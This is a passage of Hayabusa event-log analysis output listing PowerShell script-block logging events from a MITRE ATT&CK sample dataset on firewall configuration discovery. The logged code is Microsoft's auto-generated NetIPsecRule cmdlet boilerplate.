= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = 
${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } e,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall 
configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lse { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] 
${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; 
ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, 
